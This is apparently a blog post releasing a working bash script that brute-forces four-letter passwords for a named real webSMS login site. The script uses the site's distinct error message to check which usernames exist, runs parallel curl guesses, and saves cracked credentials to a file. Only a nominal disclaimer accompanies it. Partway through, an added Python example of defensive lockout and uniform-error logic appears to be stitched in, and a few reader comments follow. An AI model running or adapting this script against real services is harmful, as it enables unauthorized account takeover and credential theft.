Some time ago I posted an article about how ridiculously insecure the webSMS site was, and how relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.
For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)
EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!
#!/bin/bash
cd $HOME/Desktop
mxjobs=15
cont=0
if [ -z ${2} ]
then
cont=1
else
cont=0
fi
echo "checking if username exists"
if [ -n "`curl -s --compressed -d \"username=${1}&password=wroXngo123!@)\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
grep \"password is incorrect\"`" ]
then
echo "User exists. Let's see what happens."
else
echo "That username does not exist."
exit
fi
for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
f="${a}${b}${c}${d}"
if [ $cont -lt 1 ]
then
echo -en "skipping ${a}${b}${c}${d}\r"
if [ "${f}" = "${2}" ]
then
echo
echo "MATCH"
cont=1
fi
continue
fi
ok=0
while [ $ok -lt 1 ]
do
if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
then
ok=1
fi
done
echo -en "Testing ${f}\r"
if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&
done;done;done;done
echo "I guess we didn't find it then"
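
The script depends on two server behaviours: a distinct "password is incorrect" reply that confirms a username exists, and no limit on guesses against a four-letter A-Z password. The server-side counterpart below is an added example, not code from this post or from the webSMS site; the class name, messages and policy values are assumptions.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 5                 # assumed policy values, not taken from the post
LOCK_SECONDS = 900
GENERIC_ERROR = "Login failed."  # identical for unknown user and wrong password
KEYSPACE = 26 ** 4               # the four nested {A..Z} loops in the script


def make_record(password):
    """Return (salt, derived key) for storing a password."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class LoginGuard:
    """Hypothetical login check with uniform errors and a failure limit."""

    def __init__(self, users):
        self.users = users        # username -> (salt, key)
        self.failures = {}        # username -> (count, window start)
        self.dummy = make_record("placeholder")  # used for unknown names

    def login(self, username, password, now):
        count, start = self.failures.get(username, (0, now))
        if now - start >= LOCK_SECONDS:   # window expired: forget old failures
            count, start = 0, now
        if count >= MAX_FAILURES:         # locked: the password is not tested
            return False, GENERIC_ERROR
        # Same hashing work for unknown names, so they are not cheaper to probe.
        salt, key = self.users.get(username, self.dummy)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)
        if hmac.compare_digest(candidate, key) and username in self.users:
            self.failures.pop(username, None)
            return True, "Welcome."
        # Unknown names are counted too, so lockout does not reveal existence.
        self.failures[username] = (count + 1, start)
        return False, GENERIC_ERROR


def min_seconds_to_exhaust():
    """Lower bound on the time to try every four-letter password."""
    return KEYSPACE // MAX_FAILURES * LOCK_SECONDS
```

With these assumed values the 456,976-password keyspace takes over 82 million seconds per account instead of however fast 15 parallel requests run. A hard per-account lockout also lets anyone lock a known user out, so throttling per source address or adding a growing delay are common alternatives.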
WOT?
which language is this 1, java script?
how to get the web sms password........
i have forgot the user name!.....